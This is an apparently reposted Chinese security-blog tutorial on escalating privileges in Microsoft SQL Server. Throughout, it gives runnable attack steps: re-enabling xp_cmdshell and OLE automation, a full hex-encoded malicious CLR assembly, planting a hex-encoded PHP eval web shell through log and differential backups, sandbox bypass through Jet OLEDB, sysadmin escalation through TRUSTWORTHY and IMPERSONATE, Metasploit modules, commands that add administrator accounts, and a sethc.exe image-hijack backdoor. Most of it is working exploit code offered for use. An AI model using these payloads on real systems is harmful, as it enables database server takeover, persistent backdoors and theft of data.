0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

一文詳解MSSQL提權(quán)的相關(guān)知識

工程師鄧生 ? 來源:Z2O安全攻防 ? 作者:Z2OSEC ? 2022-09-30 09:20 ? 次閱讀

判斷當(dāng)前用戶權(quán)限

sa權(quán)限:數(shù)據(jù)庫操作,文件管理,命令執(zhí)行,注冊表讀取等system。SQLServer數(shù)據(jù)庫的最高權(quán)限

db權(quán)限:文件管理,數(shù)據(jù)庫操作等權(quán)限 users-administrators

public權(quán)限:數(shù)據(jù)庫操作 guest-users

判斷是否是SA權(quán)限

select is_srvrolemember('sysadmin')

判斷是否是db_owner權(quán)限

select is_member('db_owner')

判斷是否是public權(quán)限

select is_srvrolemember('public')

e25eff06-404d-11ed-b1c7-dac502259ad0.png

使用xp_cmdshell執(zhí)行系統(tǒng)命令(sa權(quán)限)

xp_cmdshell默認(rèn)在mssql2000中是開啟的,在mssql2005之后默認(rèn)禁止,但未刪除

判斷xp_cmdshell狀態(tài)

我們可以在master.dbo.sysobjects中查看xp_cmdshell狀態(tài)

只用判斷存在,利用count(*)即可。

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

xtype為對象類型,xtype='x'這里表示xp_cmdshell的對象類型為擴(kuò)展存儲過程。

存在即返回1 e2766128-404d-11ed-b1c7-dac502259ad0.png ? ?

啟用xp_cmdshell

如果xp_cmdshell權(quán)限沒開啟的話,我們可以利用EXEC啟用xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

e286227a-404d-11ed-b1c7-dac502259ad0.png

也可以用如下語句:

execute('sp_configure "show advanced options",1') *#**將該選項(xiàng)的值設(shè)置為**1*

execute('reconfigure')        *#**保存設(shè)置*

execute('sp_configure "xp_cmdshell", 1')    *#**將**xp_cmdshell**的值設(shè)置為**1*

execute('reconfigure')        *#**保存設(shè)置

恢復(fù)被刪除的xp_cmdshell

若xp_cmdshell被刪除,可以上傳xplog70.dll進(jìn)行恢復(fù)刪除的xp_cmdshell

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\xplog70.dll'

利用xp_cmdshell執(zhí)行命令

通過xp_cmdshell執(zhí)行系統(tǒng)命令指令如下: (master.. 可以不加)

exec master..xp_cmdshell 'whoami'

e2a6ff40-404d-11ed-b1c7-dac502259ad0.png

利用xp_cmdshell寫文件

先利用 dir 找到web服務(wù)根目錄

exec master..xp_cmdshell 'dir'

然后通過 echo 將一句話木馬寫入文件,即可連webshell

exec xp_cmdshell 'echo test>d:1.txt'

最后命令關(guān)閉xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

e2c624c4-404d-11ed-b1c7-dac502259ad0.png

使用sp_oacreate+sp_oamethod執(zhí)行系統(tǒng)命令(sa權(quán)限)

當(dāng) xp_cmdshell 被刪除可以使用這個(gè)來提權(quán)試試,恢復(fù) sp_oacreate

sp_oacreate 是一個(gè)非常危險(xiǎn)的存儲過程可以刪除、復(fù)制、移動文件。還能配合 sp_oamethod 來寫文件執(zhí)行 cmd。

使用sp_oacreate提權(quán)前提條件:

系統(tǒng)管理員使用sp_configure啟用sp_oacreate和sp_oamethod系統(tǒng)存儲過程對OLE自動化過程的訪問(OLE Automation Procedures)

在效果方面,sp_oacreate、sp_oamethod兩個(gè)過程和xp_cmdshell過程功能類似,因此可以替換使用!

利用條件:

1.已獲取到sqlserver sysadmin權(quán)限用戶的賬號與密碼且未降權(quán)(如2019版本sa用戶權(quán)限為mssqlserver,已降權(quán))

2.sqlserver允許遠(yuǎn)程連接

查看sp_oacreate狀態(tài)

select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';

返回1表示存在sp_oacreate系統(tǒng)存儲過程

開啟存儲過程

先開啟存儲過程(語句中間沒有空格,以下語句是一起執(zhí)行):

exec sp_configure 'show advanced options', 1;
RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;

e2da55a2-404d-11ed-b1c7-dac502259ad0.png

執(zhí)行命令

此時(shí)可以執(zhí)行系統(tǒng)命令了,但是使用 sp_oacreate 執(zhí)行系統(tǒng)命令不回顯:

wscript.shell 執(zhí)行命令

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'

e2fd2f00-404d-11ed-b1c7-dac502259ad0.png

可以使用以下命令創(chuàng)建用戶hack:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user hack Password@ /add'

e3109bf8-404d-11ed-b1c7-dac502259ad0.png

由于無回顯,我們可以將命令執(zhí)行的結(jié)果寫的文件中,再將文件中的內(nèi)容讀到表中,最后查詢表中的內(nèi)容

1、執(zhí)行以下命令

declare @shell INT;

exec sp_oacreate 'wscript.shell',@shell output;

exec sp_oamethod @shell,'run',null,' c:windowssystem32cmd.exe /c whoami > C: emp1.txt ','0','true';

執(zhí)行打開cmd.exe文件并執(zhí)行whoami并將結(jié)果寫入到c: emp1.txt中

e31f9824-404d-11ed-b1c7-dac502259ad0.png

2、 再將創(chuàng)建的文件1.txt寫入到readfile表中,查詢表中的內(nèi)容以驗(yàn)證上面命令是否執(zhí)行成功

Use model;

bulk insert readfile from 'C: emp1.txt'

WITH (

DATAFILETYPE = 'char',

KEEPNULLS

)

select * from readfile

使用CLR執(zhí)行系統(tǒng)命令(sa權(quán)限)

#啟用MSSQL CLR功能

exec sp_configure 'show advanced options', 1;
RECONFIGURE;
Exec sp_configure 'clr enabled', 1;
RECONFIGURE;

#為了導(dǎo)入了不安全的程序集,我們還需要將數(shù)據(jù)庫標(biāo)記為安全。

ALTER DATABASE [master] SET TRUSTWORTHY ON;

#導(dǎo)入程序集,單獨(dú)執(zhí)行

CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;

#創(chuàng)建存儲過程,單獨(dú)執(zhí)行

CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

#執(zhí)行命令

EXEC sp_cmdExec 'whoami';

#刪除該程序集

DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];

通過備份上傳木馬getshell(dbo權(quán)限)

備份拿 shell 也就涉及到了權(quán)限的問題,SA 權(quán)限不用說,沒有降權(quán)的話基本能做任何事情了,它數(shù)據(jù)庫權(quán)限是 db_owner,當(dāng)然其他用戶如果也擁有 db_owner 基本也可以通過備份拿下 shell,但是在設(shè)置目錄權(quán)限后就不行了。

路徑的尋找

需要路徑的我們一般有幾個(gè)思路:

報(bào)錯(cuò)尋找

字典

旁站信息收集

調(diào)用儲存過程來搜索

讀配置文件

這里我們著重討論一下儲存過程也就是這些函數(shù)來找我們的網(wǎng)站根目錄。一般我們可以用 xp_cmdshell、xp_dirtree、xp_dirtree、xp_subdirs

execute master..xp_dirtree 'c:'       //列出所有 c: 文件和目錄,子目錄 
execute master..xp_dirtree 'c:',1     //只列 c: 文件夾 
execute master..xp_dirtree 'c:',1,1   //列 c: 文件夾加文件

通過執(zhí)行 xp_dirtree 返回我們傳入的參數(shù),如果沒有回顯的話,可以這樣創(chuàng)建一個(gè)臨時(shí)的表插入

id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);
id=1;insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1

xp_cmdshell 尋找路徑:

這個(gè) xp_cmdshell 找起來更加方便我們調(diào)用cmd的命令去搜索,比如我的web目錄有個(gè)1.aspx

C:UsersGee>for /r c: %i in (1*.aspx) do @echo %i
c:www1.aspx

所以只需要建立一個(gè)表,存在一個(gè) char 字段就可以了。

id=1;CREATE TABLE cmdtmp (dir varchar(8000));

id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c: %i in (1*.aspx) do @echo %i'

LOG備份Getshell

備份文件小,不容易出現(xiàn)臟數(shù)據(jù),推薦使用

無論是LOG備份還是差異備份,都是利用備份的過程中寫入一句話木馬

SQLServer常見的備份策略:

每周一次完整備份

每天一次差異備份

每小時(shí)一次事務(wù)日志備份

利用前提:

目標(biāo)機(jī)器存在數(shù)據(jù)庫備份文件 ,也就是如下,我們利用test數(shù)據(jù)庫的話,則需要該test數(shù)據(jù)庫存在數(shù)據(jù)庫備份文件

知道網(wǎng)站的絕對路徑

該注入支持堆疊注入

alter database 數(shù)據(jù)庫名 set RECOVERY FULL;   #修改數(shù)據(jù)庫恢復(fù)模式為 完整模式
create table cmd (a image);        #創(chuàng)建一張表cmd,只有一個(gè)列 a,類型為image
backup log 數(shù)據(jù)庫名 to disk= 'C:phpstudyWWW1.php' with init;   #備份表到指定路徑
insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);  #插入一句話到cmd表里
backup log 數(shù)據(jù)庫名 to disk='C:phpstudyWWW2.php';   #把操作日志備份到指定文件
drop table cmd;    #刪除cmd表

第四行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 的16進(jìn)制表示

e348affc-404d-11ed-b1c7-dac502259ad0.png

e3673eea-404d-11ed-b1c7-dac502259ad0.png

會在目標(biāo)網(wǎng)站根目錄下生成1.php和2.php文件,其中1.php 保存數(shù)據(jù)庫,2.php就是我們需要連接的木馬文件。

e3a59bf4-404d-11ed-b1c7-dac502259ad0.png

用菜刀連接即可

e3b888c2-404d-11ed-b1c7-dac502259ad0.png

差異備份Getshell

注:差異備份有概率會把網(wǎng)站搞崩,所以不建議使用差異備份

利用前提

知道網(wǎng)站的絕對路徑 C:phpstudyWWW

該注入支持堆疊注入

注:以下語句一條一條執(zhí)行

create table [dbo].[test] ([cmd] [image])

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x786965 backup log @a to disk = @s with init,no_truncate

insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate

Drop table [test]

這里第二行的 0x786965,是字符 xie 的16進(jìn)制表示,這里隨便填都可以

第三行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 的16進(jìn)制表示

第四行的0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000是 C:phpstudyWWWshell.php 的16進(jìn)制表示

e3d7e0aa-404d-11ed-b1c7-dac502259ad0.png

e3f8e75a-404d-11ed-b1c7-dac502259ad0.png

e4155476-404d-11ed-b1c7-dac502259ad0.png

然后會在目標(biāo)網(wǎng)站根目錄下生成shell.php木馬文件

e43cffda-404d-11ed-b1c7-dac502259ad0.png

沙盒提權(quán)

沙盒模式是一種安全功能,用于限制數(shù)據(jù)庫只對控件和字段屬性中的安全且不含惡意代碼的表達(dá)式求值。如果表達(dá)式不使用可能以某種方式損壞數(shù)據(jù)的函數(shù)或?qū)傩裕ㄈ鏚ill 和 Shell 之類的函數(shù)),則可認(rèn)為它是安全的。當(dāng)數(shù)據(jù)庫以沙盒模式運(yùn)行時(shí),調(diào)用這些函數(shù)的表達(dá)式將會產(chǎn)生錯(cuò)誤消息。

沙盒提權(quán)的原理就是jet.oledb(修改注冊表)執(zhí)行系統(tǒng)命令。數(shù)據(jù)庫通過查詢方式調(diào)用mdb文件,執(zhí)行參數(shù),繞過系統(tǒng)本身自己的執(zhí)行命令,實(shí)現(xiàn)mdb文件執(zhí)行命令。

利用前提:

1.需要Microsoft.Jet.OLEDB.4.0一般在32位系統(tǒng)才可以,64位機(jī)需要12.0,較復(fù)雜

2.dnary.mdb和ias.mdb兩個(gè)文件 在win2003上默認(rèn)存在,也可自行準(zhǔn)備

xp_regwrite 可用、關(guān)閉沙盒模式

復(fù)現(xiàn)環(huán)境

SQL Server2008 (Win2003-x32)
IP: 192.168.112.173

1)測試 jet.oledb 能否使用

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c whoami")')

e44e8b9c-404d-11ed-b1c7-dac502259ad0.png

在SQL2005默認(rèn)是禁用Ad Hoc Distributed,執(zhí)行命令時(shí),會提示錯(cuò)誤。需要開啟

2)開啟Ad Hoc Distributed Queries組件

exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',1 ;
reconfigure;

e47e1ae2-404d-11ed-b1c7-dac502259ad0.png

類似的,關(guān)閉組件命令

exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',0 ;
reconfigure;

3)關(guān)閉沙盒模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;

沙盒模式`SandBoxMode`參數(shù)含義(默認(rèn)是2)
0:在任何所有者中禁止啟用安全模式
1:為僅在允許范圍內(nèi)
2:必須在access模式下
3:完全開啟

e4ae4654-404d-11ed-b1c7-dac502259ad0.png

查看命令:

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines', 'SandBoxMode'

關(guān)閉命令:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',2

4)執(zhí)行命令

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c whoami >c:\sqltest.txt ")');

在win2003的c盤上看到已經(jīng)創(chuàng)建了該文件,命令執(zhí)行成功

e4dbc502-404d-11ed-b1c7-dac502259ad0.png

同樣,可以創(chuàng)建用戶

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user testq QWEasd123 /add")');

Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net localgroup administrators testq /add")');

Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user testq")');

可信數(shù)據(jù)庫(DBO用戶提權(quán)到DBA)

1 預(yù)設(shè)存在漏洞的配置

打開SQL Server Management Studio,登錄sa用戶 。

e5106cee-404d-11ed-b1c7-dac502259ad0.png

點(diǎn)擊“新建查詢”,創(chuàng)建數(shù)據(jù)庫名為“TestDb”。

CREATE DATABASE TestDb;

新建測試用戶TestUser。

CREATE LOGIN TestUser WITH PASSWORD = 'Passw0rd';

使用如下的TSQL語句,數(shù)據(jù)庫TestDb的db_owner權(quán)限賦予給用戶TestUser。

USE TestDb
ALTER LOGIN [TestUser] with default_database = [TestDb];
CREATE USER [TestUser] FROM LOGIN [TestUser];
EXEC sp_addrolemember [db_owner], [TestUser];

設(shè)置TestDb數(shù)據(jù)庫為可信,這個(gè)是漏洞存在的關(guān)鍵。

ALTER DATABASE TestDb SET TRUSTWORTHY ON

下面的查詢語句會返回SQL Server實(shí)例中所有的數(shù)據(jù)庫中,可信數(shù)據(jù)庫的標(biāo)記情況,is_trustworthy_on開關(guān)為1即可信??梢钥吹絋estDb已設(shè)置為可信數(shù)據(jù)庫。

SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

e5229702-404d-11ed-b1c7-dac502259ad0.png

2漏洞利用過程

使用TestUser用戶登錄數(shù)據(jù)庫。

e5430668-404d-11ed-b1c7-dac502259ad0.png

嘗試開啟xp_cmdshell,可以看到權(quán)限不夠。

EXEC sp_configure 'show advanced options','1' --確保show advances options 的值為1
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell',1 --開啟xp_cmdshell
RECONFIGURE
GO

e5652716-404d-11ed-b1c7-dac502259ad0.png

查詢是否sysadmin角色權(quán)限,顯示0,還不是sysadmin權(quán)限。

SELECT is_srvrolemember('sysadmin')

e5764c3a-404d-11ed-b1c7-dac502259ad0.png

創(chuàng)建存儲過程sp_elevate_me。

USE TestDb
GO
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'TestUser','sysadmin'
GO

接下來,執(zhí)行上述sp_elevate_me存儲過程,給TestUser用戶添加sysadmin角色。

USE TestDb
EXEC sp_elevate_me

再次嘗試開啟xp_cmdshell,并且執(zhí)行whoami??吹铰┒蠢贸晒α?。

e58d3fd0-404d-11ed-b1c7-dac502259ad0.png

3 msf自動化提權(quán)

msf已經(jīng)內(nèi)置了攻擊模塊

auxiliary/admin/mssql/mssql_escalate_dbowner,直接調(diào)用即可。如果是從sql注入點(diǎn)提權(quán),就使用模塊

mssql_escalate_dbowner_sqli。

我的攻擊參數(shù)配置如下:

use auxiliary/admin/mssql/mssql_escalate_dbowner
SET RHOSTS 192.168.234.130
SET USERNAME TestUser
SET PASSWORD Passw0rd
run

e5af9828-404d-11ed-b1c7-dac502259ad0.png

用戶模擬(DBO用戶提權(quán)到DBA)

1預(yù)設(shè)存在漏洞的配置

使用sa帳戶登錄SQL Server,創(chuàng)建4個(gè)新用戶。

CREATE LOGIN MyUser1 WITH PASSWORD = 'MyPassword!';
CREATE LOGIN MyUser2 WITH PASSWORD = 'MyPassword!';
CREATE LOGIN MyUser3 WITH PASSWORD = 'MyPassword!';
CREATE LOGIN MyUser4 WITH PASSWORD = 'MyPassword!';

e5c7d7a8-404d-11ed-b1c7-dac502259ad0.png

賦予用戶MyUser1權(quán)限模擬 MyUser2, MyUser3,及sa,這個(gè)是漏洞存在的關(guān)鍵。在實(shí)戰(zhàn)中,未必能遇到模擬sa用戶特權(quán)的情況,但如果開發(fā)人員模擬了MyUser2或者M(jìn)yUser3,就能從MyUser1訪問其它數(shù)據(jù)庫資源。

USE master;
GRANT IMPERSONATE ON LOGIN::sa to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1];
GO

e5d99a9c-404d-11ed-b1c7-dac502259ad0.png

2漏洞利用過程

切換MyUser1用戶登錄數(shù)據(jù)庫。

執(zhí)行如下SQL語句,可以快速找到允許被模擬的用戶列表。

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'

e5fbcd38-404d-11ed-b1c7-dac502259ad0.png

執(zhí)行下面語言,在執(zhí)行了EXECUTE AS LOGIN語句后,成功模擬sa用戶特權(quán)。

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

EXECUTE AS LOGIN = 'sa'

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

e60ef246-404d-11ed-b1c7-dac502259ad0.png

3 msf自動化提權(quán)

同樣的,這個(gè)漏洞也有對應(yīng)的msf攻擊模塊。如果是從sql注入點(diǎn)提權(quán),就選擇mssql_escalate_execute_as_sqli。

我的攻擊參數(shù)配置如下:

use auxiliary/admin/mssql/mssql_escalate_execute_as
set RHOSTS 192.168.234.130
set USERNAME MyUser1
set PASSWORD MyPassword!
run

e6395040-404d-11ed-b1c7-dac502259ad0.png

映像劫持提權(quán)

2008以上,05未測試

通過使用xp_regwrite存儲過程對注冊表進(jìn)行修改,替換成任意值,造成鏡像劫持。

前提條件:

1.未禁止注冊表編輯(即寫入功能)

2.xp_regwrite啟用

復(fù)現(xiàn)

1)查看xp_regwrite是否啟用

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'

2)xp_regwrite開啟與關(guān)閉

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_regwrite',1
RECONFIGURE

3)利用regwrite函數(shù)修改組注冊表進(jìn)行劫持

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:windowssystem32cmd.exe'

e654589a-404d-11ed-b1c7-dac502259ad0.png

4)查看是否修改成功文件

